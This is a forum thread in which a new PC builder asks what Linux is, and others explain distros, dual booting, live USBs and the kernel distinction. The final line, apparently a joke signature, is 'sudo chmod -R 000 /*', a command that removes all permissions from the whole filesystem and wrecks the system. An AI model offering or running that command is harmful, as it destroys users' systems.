I plan on using Windows 10 Pro. But what's Linux. I know its some sort of software but like, I don't see any support for it. Then I hear most operating systems use Linux in some way. Does anyone recommend it? I'm not new to computers just building them. I'd like to say I know a lot about computers but in this instance it would be contradictoary. And you can switch between Linux and Windows? The only Linux I know of is hannah Montana Linux. And I don't plan on using that. Like where do you Get Linux? I'd rather not download an operating system from some shady website.

Yeah Linux is an open-source OS which is an alternative to Windows and MacOS. The most popular ones are Ubuntu and Mint I think.

If you want to try one of them out, have a go at installing them into a virtual machine with virtualbox.

I edit my posts a lot.

OK, Linux is a free open source OS that has MANY different flavors (ex: Ubuntu, Mint, Redhat...) It is really fun to mess around with and it does support some features and Applications Windows does. HOWEVER, Linux is very highly UNsupported by most games and applications, it does have Steam support and other things but IMO its worth a try, Yes you can switch between windows and linux, its called dual booting. Look at this:

64GB of RAM is OP for just Windows

I was planning on more but I've ran out of space on the motherboard. I would go with 128 or 256 if I could. I know its overkill but it's fine, I hate empty ram slots.

You realise it won't make your system any faster right? With RAM your system just uses the amount it needs, the rest will just be unused..

Does you mum know you're here?

linux is a kernel. windows NT is a kernel too, its what the windows platform runs on. linux is open source, everyone can see how its coded and how it works, at every level. windows is closed source, only microsoft knows the coding. linux has a lot off different environments, some desktop oriented some pure command line. linux mint for example is always said to be a good starting linux distribution (distro for short). linux has pretty good support from games, about 90% of my steam list supports linux.

Would this cause extra strain on the CPU? I do plan on having 64gb of ram and i76700k.

No. Your options are either running Linux instead of Windows or both side-by-side. When not active (aka when you have to other one booted), other only uses storage space. Linux is much lighter to run than Windows. You can give older machine new life just by using Linux instead of Windows.

That being said, if you want to try Linux, you can use Live-CD (or rather USB) versions. You boot to full OS and can use it like its installed. But nothing is saved and then you can just return to Windows.

Woah, way too much misinformation around here.

Linux is not a full os - it is a kernel. Windows also has a kernel but it has nothing to do with Linux. Android uses the Linux kernel for example. There are many full operating systems built around Linux that you can find online and try out if you want.

There are benefits to using linux if you are willing to spend the time and effort required to use it effectively. It's free and open source, it doesn't come with spyware (usually, although it depends on the specific os) and it's unix-like, making it more suitable for system administration. Linux based OSs are also usually lighter than windows and give the user more choice in how their system is built and behaves.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
